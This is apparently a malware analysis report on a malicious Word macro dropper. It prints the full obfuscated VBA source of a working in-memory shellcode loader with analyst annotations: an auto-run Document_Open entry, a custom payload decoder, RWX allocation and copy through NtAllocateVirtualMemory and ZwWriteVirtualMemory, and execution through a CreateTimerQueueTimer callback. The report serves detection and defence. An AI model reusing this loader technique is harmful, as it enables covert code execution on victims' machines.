Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 62e6e5dc0c3927a8…

MALICIOUS

Office (OLE)

193.5 KB Created: 2017-03-15 13:02:00 Authoring application: Microsoft Office Word First seen: 2018-07-04
MD5: bbd821ba3da93a4787d74d233d23e852 SHA-1: 6a0d0b91c6d5814e8b0b9f94ee27aceb7ff39d33 SHA-256: 62e6e5dc0c3927a8c5d708688ca2b56df93848b15a4c38aab173c5a8384395f9
90 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 (Command and Scripting Interpreter: Visual Basic); T1566.001 (Phishing: Spearphishing Attachment)

The file is identified as malicious by ClamAV with the signature 'Doc.Dropper.ZwMacros-6057750-0', indicating that it is a macro-based dropper. The presence of a 'Document_Open' macro and extensive VBA code further supports this, suggesting the macros are intended to download and execute a secondary payload. The obfuscated nature of the VBA code prevents a more detailed analysis of its specific actions; note, however, that the extracted module 'dactyloctenium' declares NtAllocateVirtualMemory, ZwWriteVirtualMemory and CreateTimerQueueTimer under randomized alias names, which is consistent with an in-memory loader stage, so any download behaviour would most likely belong to the staged code rather than to the VBA itself.

Heuristics 4

  • ClamAV: Doc.Dropper.ZwMacros-6057750-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    Dim afeard As Variant
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. In this sample all extracted URLs are XMP/RDF schema namespace identifiers (Adobe XMP, Dublin Core, W3C RDF) found in the document body, most likely from embedded image metadata rather than an address contacted by the macro.
    • http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ — In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# — In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13893 bytes
SHA-256: 2b9448538e558439b73ec4fbf619e22cee68b131a4885e17b903097818c2e72a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Entry routine reached from Document_Open (which calls "bubaline"). Reads the encoded
' payload out of a form control, decodes it with dactyloctenium.dispenser, hands the
' result to herbarist (copy into a fresh RWX allocation) and finally registers an
' address inside that allocation as the callback of CreateTimerQueueTimer ("grount").
' Most other statements are filler: dead string/number assignments, undeclared names
' that evaluate to Empty (the module has no Option Explicit) and VBA.NPer calls whose
' result is discarded.
Sub bubaline()
Dim daughterly As Integer
Dim embezzled As Variant
' "lassoo" is a separate module whose VB_Base attribute carries two GUIDs, i.e. it looks
' like a UserForm; "rose" is presumably a control exposing .SelectedItem (MultiPage /
' TabStrip style) - confirm in the form. Day(#12/5/2007#) is simply 5.
lassoo.rose.Value = Day(#12/5/2007#)
drunkenness = "elderly"
plataleidae = "chickadee"
Set bigamist = lassoo.rose.SelectedItem
mollify = 35
mbabane = 29167
alpestrine = 598047
' Filler: financial function whose result is dropped (repeated throughout the module).
 VBA.NPer 0, mollify, 15824, 26380, 6

' The encoded payload is the selected item's Name; its rightmost 5828 characters are
' used (dispenser processes exactly bytes 0..5827).
diaphysis = bigamist.Name
cargo = 5828
placement = Right(diaphysis, cargo)
' Decode (per-byte shift, then Base64 - see dispenser). The decoded bytes come back
' packed in a String.
libel = dactyloctenium.dispenser(placement)
aborning = 111
marginally = 27117
benthos = 563654
 VBA.NPer 0, aborning, 9539, 16474, 7

pennyroyal = "degressive"
#If Win64 Then
Dim finedraw As Byte
Dim newsless As LongPtr
Dim beriberi As LongPtr
Dim sugarloaf As String
#Else
Dim nobler As Integer
Dim beriberi As Long
Dim acholia As Variant
Dim newsless As Long
#End If
' pisum evaluates to 0; boric and bloodyminded are undeclared (Empty). All filler.
pisum = 125 + 14 + 120 - 259
gybe = "nonresonant"
portugal = boric
mosquitofish = 4096
deiodinating = 19
heavendirected = 4503
asuncion = 563868
 VBA.NPer 0, deiodinating, 36397, 51222, 4

betty = bloodyminded
cain = "castaneous"
brickyard = "cullibility"
harrier = 87
alumnus = 36554
antithetically = 414881
 VBA.NPer 0, harrier, 7318, 34248, 6

' herbarist allocates an executable region, copies the decoded bytes into it and
' returns the region's base address.
carelessly = libel
pome = "unairworthy"
facilitate = "hunted"
newsless = herbarist(carelessly)
dooly = "accommodate"
' estrilda is the entry offset into the copied bytes: 1312 on Win64,
' 80 + 415 + 2657 = 3152 on 32-bit - presumably because the two payload builds differ
' (not verifiable from the VBA alone).
#If Win64 Then
Dim factor As Integer
Dim liliales As LongPtr
Dim redoundto As LongPtr
Dim organon As LongPtr
estrilda = 67 - 98 - 75 + 1418
#Else
Dim liliales As Long
millwheel = 80 + 415
Dim redoundto As Long
Dim organon As Long
estrilda = millwheel + 2657

#End If
Dim affirmativeness As String
Dim hemingwayesque As String
liliales = 0
' beriberi = region base + offset: the address that will be executed.
beriberi = newsless + estrilda
' redoundto = 201527; it only serves as the ByRef slot that receives the timer handle.
redoundto = 55 - 60 + 201532
organon = 3500
' grount is CreateTimerQueueTimer (see the Declares in module dactyloctenium).
' Positionally: phNewTimer = &redoundto (first parameter is ByRef), TimerQueue = 0
' (default queue), Callback = beriberi, Parameter = 0, DueTime = 0 (run as soon as
' possible), Period = 0, Flags = 0. Execution thus transfers into the decoded buffer on
' a thread-pool thread. Declaring this API together with NtAllocateVirtualMemory /
' ZwWriteVirtualMemory from VBA is a strong static indicator for detection.
newsroom = grount(redoundto, liliales, beriberi, liliales, liliales, liliales, liliales)
divinum = 44
scurry = 23946
unalluring = 268503
 VBA.NPer 0, divinum, 33149, 46504, 5

End Sub

' Takes the decoded payload (the String produced by dispenser) and returns the base
' address of a freshly allocated executable region into which the first 4370 bytes of
' the payload have been copied. The copy primitive is reminiscence(), i.e.
' ZwWriteVirtualMemory against the current process.
Function herbarist(metalepsis)
Dim meticulous As Integer
Dim worldwideness As String
Dim noiselessness As String
Dim balloon As Integer
#If Win64 > 0 Then
Dim bushel As Long
Dim punicaceae As LongPtr
' chateaux evaluates to 8 here: the pointer size on Win64.
chateaux = 74 + 82 - 148
Dim underage As LongPtr
Dim antigram As Variant
Dim mopish As Long
Dim abdication As LongPtr
Dim ageratina As Variant
#Else
Dim distinction As String
Dim punicaceae As Long
' chateaux evaluates to 4 here: the pointer size on 32-bit.
chateaux = 101 + 17 - 114
Dim underage As Long
Dim barrack As String
Dim abdication As Long
Dim unimitated As String
Dim rama As Long
#End If
' Step 1: read the data pointer out of the Variant argument. VarPtr(metalepsis) + 8 is
' the data union of the VARIANT structure, so for a String argument this copies the
' BSTR (character data) pointer into punicaceae - inferred from the VARIANT layout;
' confirm against the 32-/64-bit builds.
highlander = VarPtr(punicaceae)
burglary = reminiscence(highlander, VarPtr(metalepsis) + 8, chateaux)
' Step 2: asperity is NtAllocateVirtualMemory. ProcessHandle = -1 (current process),
' BaseAddress = &underage (0 -> kernel chooses), ZeroBits = 0, RegionSize = &abdication
' (9670 bytes), AllocationType = 4096 (MEM_COMMIT), Protect = 64 (PAGE_EXECUTE_READWRITE).
' An RWX allocation requested from VBA is a key behavioural indicator.
excursive = -1
underage = 0
personableness = 0
abdication = 9670
catalepsy = 4096
ibuprofen = 64
cowpens = asperity(ByVal excursive, underage, ByVal personableness, abdication, ByVal catalepsy, ByVal ibuprofen)
' cration / deportment are undeclared module-wide names also touched in reminiscence
' and dispenser; filler.
cration = "dapple"

deportment = Fix(284)

' Step 3: copy 4370 bytes from the decoded string data into the new region
' (a 5828-character Base64 string decodes to 4371 bytes).
reminiscence underage, punicaceae, 4370
chiefdom = 71
inchon = 22602
paternal = 289514
 VBA.NPer 0, chiefdom, 20479, 37527, 8

' Return the base address of the executable region.
herbarist = underage
End Function
' In-process memory copy built on ZwWriteVirtualMemory ("avast"): copies `learn` bytes
' from address `adductor` to address `viatical` within the current process. Called from
' herbarist both to fetch a pointer out of a Variant and to write the decoded payload
' into the executable region. No return value is assigned (the result is Empty).
Function reminiscence(viatical, adductor, learn)
#If Win64 Then
Dim pilon As Integer
Dim anorthite As Byte
Dim adenography As LongPtr
Dim blackandblue As LongPtr
Dim uraninite As LongPtr
Dim folio As Long
Dim ductule As LongPtr
Dim pinckneya As LongPtr
#Else
Dim blackandblue As Long
Dim morbidity As String
Dim adenography As Long
Dim anecdotist As Long
Dim ductule As Long
Dim neurasthenic As String
Dim uraninite As Long
Dim champleve As Variant
Dim pinckneya As Long
Dim incase As Variant
Dim peccant As Byte
#End If
' Filler: deportment / curbside / cration / bateau are undeclared module-wide names;
' none of them influence the copy.
cadmiumyellow = Fix(331)
curbside = deportment Or 55
' Destination, size and source for the write.
blackandblue = viatical
pinckneya = learn
cration = cration
ductule = adductor
alight = 98
camphoraceous = 25669
conductive = 300043
 VBA.NPer 0, alight, 39627, 23426, 4

unretracted = bloodstained
' adenography = -1: the current-process pseudo handle.
adenography = 94 - 35 - 60
' ZwWriteVirtualMemory(ProcessHandle = -1, BaseAddress = dest, Buffer = src,
' NumberOfBytesToWrite = size, NumberOfBytesWritten = uraninite). The Declare marks
' every parameter ByVal As Any, so the never-initialised uraninite is passed as the
' value 0, i.e. a NULL written-count pointer.
avast ByVal adenography, blackandblue, ductule, pinckneya, uraninite
deportment = bateau And 140
End Function
' Decoy routine: a verbatim-looking Word object-model example (maximise a minimised
' document window). It is not referenced by any routine in the visible listing;
' presumably copied in to make the module look like ordinary automation code.
Sub max()
    With Documents("Example.doc").Windows(1)
        If .WindowState = wdWindowStateMinimize Then _
            .WindowState = wdWindowStateMaximize
    End With
End Sub

' Auto-executing entry point: Word runs Document_Open when the document is opened
' (this is the routine the OLE_VBA_DOCOPEN heuristic matched). The only meaningful
' statement is the call to bubaline; the rest is filler.
Private Sub Document_Open()
Dim afeard As Variant
Dim pieridae As Variant
predesigned = "extrados"
escritoire = "decorous"
' Starts the decode -> allocate -> copy -> timer-callback chain.
bubaline
butadiene = 82
intrasentential = 12165
dandiprat = 258935
 VBA.NPer 0, butadiene, 32751, 45510, 5
End Sub


Attribute VB_Name = "dactyloctenium"
' Win32 / NT API imports under randomized alias names. Only three are used by the
' visible code: asperity (NtAllocateVirtualMemory, called in herbarist), avast
' (ZwWriteVirtualMemory, called in reminiscence) and grount (CreateTimerQueueTimer,
' called in bubaline). PathFileExists, SHChangeNotification_Lock, NtDeleteAtom,
' NtContinue and ReadConsoleW are declared but never referenced in the listing -
' presumably decoys. Several Lib names carry trailing spaces ("Ntdll.dll  "), most
' likely to defeat exact-string signatures on "ntdll.dll"; whether the loader tolerates
' them is not verifiable here but the routines are reached by the code. The interleaved
' song-lyric comments are filler. The PtrSafe branch applies to 64-bit Office, the
' #Else branch to 32-bit.
'  In the age of greed, the age of need mother earth
'  We're lost, we're killing children in the name of
#If Win64 Then
'  Would I tell you good-by or would I defend you through fire?
'  In the age of greed, the age of need mother earth
' grount -> kernel32!CreateTimerQueueTimer (used to execute the decoded buffer).
Public  Declare PtrSafe Function grount Lib "Kernel32" Alias "CreateTimerQueueTimer" (flannelbush As Any, ByVal consenting As Any, ByVal styleless As Any, ByVal sight As Any, ByVal horsepower As Any, ByVal infusible As Any, ByVal pacify As Any) As Long
'  Karma's a bitch and I feel her breath on my neck kid
'  I go for mine and you go for yours
' purblindness -> shlwapi!PathFileExists (unused in the listing).
Public Declare PtrSafe Function purblindness Lib "Shlwapi.dll" Alias "PathFileExists" (jaculus As LongPtr) As LongPtr
'  Would I tell you good-by or would I defend you through fire?
'  And still I had to burn some bridges cause somehow it
' avast -> ntdll!ZwWriteVirtualMemory (in-process memcpy primitive, see reminiscence).
Public Declare PtrSafe Function avast Lib "Ntdll.dll  " Alias "ZwWriteVirtualMemory" (ByVal airfoil As Any, ByVal sus As Any, ByVal concordiam As Any, ByVal unenthusiastically As Any, ByVal caesura As Any) As LongPtr
'  Then hate multiplies and we lose it all.
'  Bin Laden's not gonna stop it evolving
' unallied -> shell32!SHChangeNotification_Lock (unused in the listing).
Public Declare PtrSafe Function unallied Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (gulp As LongPtr, varied As Any,comfrey As LongPtr, adversum As Any) As Boolean
'  I hate to look in the mirror
'  But life's a too long road to walk alone though
' asperity -> ntdll!NtAllocateVirtualMemory (RWX allocation, see herbarist). Note the
' mangled parameter "provedByVal": the ByVal keyword was fused into the name.
Public Declare PtrSafe Function asperity Lib "ntdll.dll  " Alias "NtAllocateVirtualMemory" (spirometer As LongPtr, amphisbaenidae As LongPtr, ByVal bobble As LongPtr,provedByVal As LongPtr, featherbedding As LongPtr, ByVal disunion As LongPtr) As LongPtr
'  I look in the mirror trying to see a better man
'  What I was blessed with
' centaury -> ntdll!NtDeleteAtom (unused in the listing).
Public Declare PtrSafe Function centaury Lib "ntdll.dll" Alias "NtDeleteAtom" (deliriously As LongPtr)
'  And still I had to burn some bridges cause somehow it
'  But life's a too long road to walk alone though
' inflammatory -> ntdll!NtContinue (unused in the listing).
Public Declare PtrSafe Function inflammatory Lib "ntdll.dll" Alias "NtContinue" (habited As LongPtr,arriving As LongPtr,significance As LongPtr) As LongPtr
'  Lost souls speaking chat-room morse-code
'  A poor set of cards a poor number of jobs
' shareware -> kernel32!ReadConsoleW (unused in the listing).
Public Declare PtrSafe Function shareware Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal methicillin As LongPtr,conscription As LongPtr,meryta As LongPtr,avantcourier As LongPtr,kedgeree As LongPtr) As Boolean
'  If I close my eyes and you close your door
'  With are selfless

'  But life's a too long road to walk alone though
'  Would I carry your weight,
#Else
'  A poor set of cards a poor number of jobs
'  Or say have it your way?
' beautician -> shlwapi!PathFileExists (32-bit twin of purblindness; unused).
Public Declare Function beautician Lib "Shlwapi.dll" Alias "PathFileExists" (likewise As Long) As Long
'  No man is an island, I'll be damned if I'm lying
'  I look in the mirror trying to see a better man
' asperity -> ntdll!NtAllocateVirtualMemory (32-bit; same fused "amphineuraByVal" name).
Public Declare Function asperity Lib "Ntdll.dll " Alias "NtAllocateVirtualMemory" (moneses As Long, uneconomical As Long, ByVal eos As Long, amphineuraByVal As Long, gutted As Long, ByVal dispart As Long) As Long
'  I go for mine and you go for yours
'  Would I tell you good-by or would I defend you through fire?
' allopurinol -> kernel32!ReadConsoleW (unused).
Public Declare Function allopurinol Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal helps As Long, silk As Long, muishond As Long, hurry As Long, chalcostigma As Long) As Boolean
'  I go for mine and you go for yours
'  Would I tell you good-by or would I defend you through fire?
' psidium -> ntdll!NtDeleteAtom (unused).
Public Declare Function psidium Lib "ntdll.dll" Alias "NtDeleteAtom" (boarfish As Long)
'  I go for mine and you go for yours
'  Would I tell you good-by or would I defend you through fire?
' campestrine -> shell32!SHChangeNotification_Lock (unused).
Public Declare Function campestrine Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (celtic As Long, dictatorial As Any, waterlogged As Long, praline As Any) As Boolean
'  I go for mine and you go for yours
'  Would I tell you good-by or would I defend you through fire?
' czechoslovakia -> ntdll!NtContinue (unused).
Public Declare Function czechoslovakia Lib "ntdll.dll" Alias "NtContinue" (handily As Long, chains As Long, brittlebush As Long) As Long
'  I go for mine and you go for yours
'  Would I tell you good-by or would I defend you through fire?
' grount -> kernel32!CreateTimerQueueTimer (32-bit).
Public Declare Function grount Lib "Kernel32" Alias "CreateTimerQueueTimer" (amended As Any, ByVal unrefreshed As Any, ByVal avellan As Any, ByVal appetize As Any, ByVal onoclea As Any, ByVal polystyrene As Any, ByVal pintsize As Any) As Long
'  I go for mine and you go for yours
'  Would I tell you good-by or would I defend you through fire?
' avast -> ntdll!ZwWriteVirtualMemory (32-bit).
Public Declare Function avast Lib "Ntdll.dll   " Alias "ZwWriteVirtualMemory" (ByVal mesophytic As Any, ByVal ambidextral As Any, ByVal elementary As Any, ByVal cardiospasm As Any, ByVal diagrammatically As Any) As Long
'  I go for mine and you go for yours
'  Would I tell you good-by or would I defend you through fire?

'  And still I had to burn some bridges cause somehow it
'  Lot of people got dealt with,
#End If
'  Bin Laden's not gonna stop it evolving
'  I'm generating my money, they aint taking my money
' Builds the 256-entry reverse lookup table of the standard Base64 alphabet:
'   'A'..'Z' (65..90)  -> 0..25   (doxy - 65)
'   '0'..'9' (48..57)  -> 52..61  (doxy + 4)
'   'a'..'z' (97..122) -> 26..51  (doxy - 71)
'   '/' (47) -> 63, '+' (43) -> 62
' Every other position stays 0 (so '=' padding decodes as 0). Returned as a Byte
' array; dispenser stores it in eruditeness.
Function airmanship()
Dim thamnophilus(255) As Byte
' 24 + 41 = 65 = Asc("A")
doxy = 24 + 41
Do
thamnophilus(doxy) = doxy - 65
doxy = doxy + 1
Loop Until doxy = 91
' 48 = Asc("0")
doxy = 48
Do
thamnophilus(doxy) = doxy + 4
doxy = doxy + 1
Loop Until doxy = 58
' 97 = Asc("a")
doxy = 97
Do
thamnophilus(doxy) = doxy - 71
doxy = doxy + 1
Loop Until doxy = 123
' '/' -> 63 and '+' -> 62
thamnophilus(47) = 63
doxy = 43
thamnophilus(doxy) = 62
airmanship = thamnophilus
End Function
' Arithmetic dispatcher used by dispenser to hide the Base64 operators behind numeric
' selectors: 44 -> integer division (\), 54 -> bitwise And, 62 -> multiplication.
' Any other selector leaves the result Empty.
Function attacker(barosaur, inexorable, andesite)
Select Case andesite
Case 44
attacker = barosaur \ inexorable
Case 54
attacker = barosaur And inexorable
Case 62
attacker = barosaur * inexorable
End Select
End Function
' Thin wrapper over AscW (Unicode code point of the first character). Not referenced
' by any routine in the visible listing.
Function bundledup(bissau)
bundledup = AscW(bissau)
End Function
' Decoy routine: an Access object-model example (Forms / Form belong to Access, not
' Word) that lists open forms in the Immediate window. Not referenced anywhere in the
' visible listing; presumably pasted in as cover.
Sub IterateOpenForms()
    Dim frm As Form
    
    For Each frm In Forms
        'Print the name of the referenced form to the Immediate window
        Debug.Print frm.Name
    Next frm
End Sub

' Decoder for the payload string lifted from the form control. Two stages:
'   1. StrConv(..., 128) (vbFromUnicode) converts the String to ANSI bytes, then 4 is
'      subtracted from every even-indexed byte and 3 from every odd-indexed one
'      (beseech = vbKeyShift - 12 = 16 - 12 = 4) over bytes 0..5827.
'   2. The result is Base64-decoded by hand: airmanship() supplies the reverse
'      alphabet, attacker() performs *, And and \ behind numeric selectors, and the
'      constants below are 64 / 4096 / 262144 (6-bit shifts), &HFF0000 / &HFF00 / &HFF
'      (byte masks) and 65536 / 256 (byte shifts), all written as arithmetic.
' Output is the 6963-byte buffer spleenly (5828 chars -> 4371 decoded bytes, rest 0),
' returned through the String result: VBA assigns a Byte array to a String by copying
' the bytes as-is, which is why herbarist can read the string's data pointer directly.
' Everything else (Math.Round, Rnd, unused Dims, VBA.NPer, dead constants) is filler.
Function dispenser(blameworthy) As String
Dim tussilago As Long

Dim rimiform As Long
Dim superabundance(63) As Long
bateau = Math.Round(84)

Dim thallus As String

Dim ahura(63) As Long
curbside = Fix(146)

Dim flowmeter As String

Dim ribbed As Integer
Dim eurasia As String
bateau = Rnd(372)

Dim aepyorniformes As Long
Dim preraphaelite As Long
Dim silentio As Long

' Output buffer (6963 bytes) and the three shift tables.
Dim spleenly(6962) As Byte
Dim gymnadenia(63) As Long
Dim gobbledygook() As Byte
Dim hearsay As Long
' unprovable = 256 (divisor that isolates the middle output byte)
unprovable = 19 - 64 - 76 + 377
haemanthus = 63
cacicus = 10 + 62 + 3960
Dim argyreia As String

' barometric = 65536 (divisor for the high output byte); retem = &HFF0000; hydrocarbon = 64
barometric = 60 + 93 + 65383
retem = 16711680
hydrocarbon = 64
Dim booklouse As Variant

' porthole = 4096 (64^2); beryllium = &HFF00; autotomic and rutabaga are never used
autotomic = 16515072
porthole = 6 + 9 + 4081
rutabaga = 81 - 51 + 258018
beryllium = 65280
Dim metalloid As Variant

' biopsy = 262144 (64^3); ironical = 255 (&HFF)
biopsy = 67 + 262077
ironical = 123 - 95 - 73 + 300
Dim hearing As Integer
fumariaceae = 0
calorifacient = 11 + 5816
Dim eos() As Byte
Dim carlyle As Byte
Dim cornetapistons As String
' 128 = vbFromUnicode: String -> ANSI byte array
eos = StrConv(blameworthy, 128)
Dim gnu As Integer
aghan = 38
chandlery = 37055
alveolitis = 434442
 VBA.NPer 0, aghan, 34621, 15328, 2

' Stage 1: alternating -4 / -3 shift over the first 5828 bytes (vbKeyShift = 16).
unbridgeable = 5827
beseech = vbKeyShift - 12
For devils = 0 To unbridgeable
If devils Mod 2 = 0 Then
eos(devils) = eos(devils) - beseech
Else
eos(devils) = eos(devils) - (beseech - 1)
End If
Next devils
boise = 111
pectinated = 33852
abetalipoproteinemia = 227594
 VBA.NPer 0, boise, 20090, 59662, 6

' Shift tables: superabundance(i) = i*64, gymnadenia(i) = i*4096, ahura(i) = i*262144,
' i.e. a 6-bit value moved to bit positions 6, 12 and 18. eruditeness is the Base64
' reverse alphabet from airmanship.
ribbed = 0
antineoplastic = 128 + 78 - 69 - 137
political = 43
eruditeness = airmanship
For aepyorniformes = 0 To 63
superabundance(aepyorniformes) = attacker(aepyorniformes, hydrocarbon, 62)
gymnadenia(aepyorniformes) = attacker(aepyorniformes, porthole, 62)
ahura(aepyorniformes) = attacker(aepyorniformes, biopsy, 62)
Next aepyorniformes
choice = 100
marbling = 30694
antiproton = 496927
 VBA.NPer 0, choice, 12758, 31486, 4

gobbledygook = eos
choky = 108 - 33 - 71
genital = 72
reappraisal = 21770
critter = 246606
 VBA.NPer 0, genital, 17991, 12395, 6

' fang = 3 (index of the 4th input char), empyreumatic = 2 (index of the 3rd output byte)
fang = 123 + 118 - 44 - 194
cration = "dixit"

semicolon = bloodstained

furled = fang + 1
empyreumatic = 23 - 103 - 112 + 194
' Stage 2: for each group of 4 input chars (hearsay advances by 3 in the body plus 1
' in Next) assemble the 24-bit value T[c0]<<18 | T[c1]<<12 | T[c2]<<6 | T[c3] and
' split it into three bytes with the masks/divisors above; preraphaelite advances by 3.
For hearsay = 0 To unbridgeable
interphone = gobbledygook(hearsay)
cluster = gobbledygook(hearsay + 2)
rimiform = ahura(eruditeness(interphone)) _
 + gymnadenia(eruditeness(gobbledygook(hearsay + 1))) + superabundance(eruditeness(cluster)) + eruditeness(gobbledygook(hearsay + fang))
aepyorniformes = attacker(rimiform, retem, 54)
spleenly(preraphaelite) = attacker(aepyorniformes, barometric, 44)
aepyorniformes = attacker(rimiform, beryllium, 54)
spleenly(preraphaelite + 1) = attacker(aepyorniformes, unprovable, 44)
spleenly(preraphaelite + empyreumatic) = attacker(rimiform, ironical, 54)
preraphaelite = preraphaelite + empyreumatic + 1
hearsay = hearsay + 3
Next
' Byte array -> String result (raw byte copy).
dispenser = spleenly
End Function



Attribute VB_Name = "lassoo"
Attribute VB_Base = "0{900AB79B-87A8-4F9B-B587-D99536141F74}{E3428541-6E9B-4542-9F06-0F44C01CE8A1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False